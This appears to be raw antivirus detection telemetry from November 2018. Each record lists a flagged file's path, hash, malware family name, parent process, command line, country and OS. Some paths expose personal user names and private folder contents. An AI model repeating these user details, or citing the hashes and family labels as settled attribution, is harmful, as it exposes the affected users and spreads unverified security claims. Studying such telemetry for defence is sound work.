  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='0184cd0a877d5d0d8c77734ed26e2b182e6052c03462dbd9b60a8c1ae5f97312', metadata=Row(cmdline='--engine=2 --session-id=1r\\\\\\/45vbNheB4DtDgQipJqQgI4aNf+V+PC0nD0pUS --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-01T19:25:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ssf2_multihack_v211.exe', filepath='C:\\Users\\X\\Downloads\\SSF2_MultiHack_v211\\SSF2_MultiHack_v211.exe', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='162acb8d677c39bf5e2c87035847d1c699bc6fc193de81c09e03bd252f01eeeb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T20:47:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='04160c49b4ba0293caf3b2d894e87517292eb1f25e6d7a1e95721bd53733c2a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\04160C49B4BA0293CAF3B2D894E87517292EB1F25E6D7A1E95721BD53733C2A4', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='04160c49b4ba0293caf3b2d894e87517292eb1f25e6d7a1e95721bd53733c2a4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T06:55:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX08.786\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX08.786\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T15:58:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171639-f3b70059', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-171639-F3B70059', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:16:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Documents\\My Games\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Documents\\My Games\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:21:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:57:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:00:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='D:\\Steam\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:25:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cavallaro.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI\\CAVALLARO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150906-f4f65678', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150906-F4F65678', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsq5B5.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T20:24:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='chiavetta tesi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\CHIAVETTA TESI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eyzcneva.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\EYZCNevA.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='robinson_crusoe.exe', filepath='\\?\\J:\\Adventures of Robinson Crusoe\\Robinson_Crusoe.exe', filesize=2496000, name='HEUR/APC.#M1.#R1'), hash='e6c292377a03ba1a6623d0e455522fdf00202f52d57b81fcfe981aae5b53c2b8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:54:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashplayerinstaller.exe', filepath='D:\\Backups\\Contmac\\drive\\Fiscal_Contmac\\OUTROS\\SysWOW64\\FlashPlayerInstaller.exe', filesize=18176000, name='W32/Stanit.#M1.#R1'), hash='c1d475681282cd4f133cf5ac615ad63c7293bbbd22d7407a79e1430f82355560', metadata=Row(cmdline='\\\\\\\\\\\\\\\\CONTPARTNER-BKP\\\\\\\\BKP_Completo\\\\\\\\ D:\\\\\\\\Backups\\\\\\\\ \\\\\\/MIR \\\\\\/R:2 \\\\\\/W:2', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\Robocopy.exe', parentsize=98816, timestamp='2018-11-01T16:30:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rlistupdater', filepath='/private/var/folders/1s/fbj98h4s57504rj7tl8czrxr0000gn/T/com.blacey.SuperDuper/DD0AE88E-61EA-4028-8B3C-D1545D6D4268/snapshot/Users/neil/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095644-8bd46668', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095644-8BD46668', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:56:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b99b1d8ce44adb3d7693907b7672ddc28e0aeee2d1f3fa7894aa642eb9896999', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B99B1D8CE44ADB3D7693907B7672DDC28E0AEEE2D1F3FA7894AA642EB9896999', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b99b1d8ce44adb3d7693907b7672ddc28e0aeee2d1f3fa7894aa642eb9896999', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094634-170fe5ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094634-170FE5CA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:46:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095448-7593d84c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095448-7593D84C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:54:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='istruzioni operative corsi formazione adulti.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\MODULI 2016-2017\\ISTRUZIONI OPERATIVE CORSI FORMAZIONE ADULTI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095657-8e52f1a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095657-8E52F1A9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150007-8db7ae42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150007-8DB7AE42', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T17:19:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\g5dwikhyj1u\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:38:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145957-8bee3a8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145957-8BEE3A8C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='microsoft toolkit.2.5.3.exe', filepath='F:\\Microsoft Toolkit.2.5.3.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9ea296ef2d26b518fc5a206d110163bf53cdb924e081a145c6c057aa546834ac', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T06:15:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pcr2dredgar                                   .scr', filepath='E:\\Proyecto\\PCR2DREdgar                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:12:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-134709-c127852c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_94ce1b23\\AVSCAN-20181104-133442-66029BA9\\AVSCAN-20181104-134709-C127852C', filesize=1536000, name='PUA/AD.BitcoinMiner.B.#M1.#R1'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-224904-e10ebc06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200344-27575B99\\AVSCAN-20181104-224904-E10EBC06', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:49:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145945-45788a44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3d880bdd\\AVSCAN-20181104-145924-420AEFA6\\AVSCAN-20181104-145945-45788A44', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:59:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131348-22d193f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131348-22D193F4', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:13:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162337-f6797d65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-162337-F6797D65', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:23:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131257-1ef873bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131257-1EF873BD', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:12:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140309-f5cc093e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140309-F5CC093E', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151609-9cf6bae9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_da816b3a\\AVSCAN-20181104-133150-2E40D7CA\\AVSCAN-20181104-151609-9CF6BAE9', filesize=1664000, name='PUA/AD.InstallCore.B.#M1.#R1'), hash='3e59ba4561b40b6d4e4bc1d6638a01bf01b006e25010c592a549fd4ad2a48e8d', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:16:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001229-6de6213c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001229-6DE6213C', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:42:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214354-cf82408c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9072d99e\\AVSCAN-20181104-214341-CCB9A8D2\\AVSCAN-20181104-214354-CF82408C', filesize=13888000, name='HEUR/AGEN.1034874.#M1.#R1'), hash='30ebdb6456b07c0c037c3654b65346acc8d38e82ecb6c637507f07df1fbcafad', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:43:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='50c1ae6d2e294.ocx', filepath='C:\\Users\\All Users\\SaveAs\\50c1ae6d2e294.ocx', filesize=128000, name='ADWARE/Adware.Gen.#M2.#R4876'), hash='4f2c543edd9f54151ae962e25b743ac11b649e68ab9bcb8a66c0c5202edc2f7f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T18:40:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gzg.exe', filepath='\\\\?\\C:\\ProgramData\\GZG\\GZG.exe', filesize=2752000, name='SPR/Tool.Monitor.Gen.#M1.#R1'), hash='78c50eac5ef1e2f2556efc7bf652caea34183377a21a938301f9223799907f2f', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:59:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:31:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214558-0404c00f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-214558-0404C00F', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:46:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T19:00:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\AVIRA\\ANTIVIRUS\\AVIRASECURITYCENTERAGENT.EXE', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-03-07-04-23.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-22T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', parentsize=840000, timestamp='2018-11-04T00:14:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pg_config.exe', filepath='C:\\manageengine\\supportcenter\\pgsql\\bin\\pg_config.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R5151'), hash='8075f81132cf522be54d082d9fa92bd5803395f4b384855ed9dd87466b39b900', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ZDvEXMMSPkGHKWcl.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=81640, timestamp='2018-11-04T02:57:49Z'), dt=datetime.date(2018, 11, 4)),
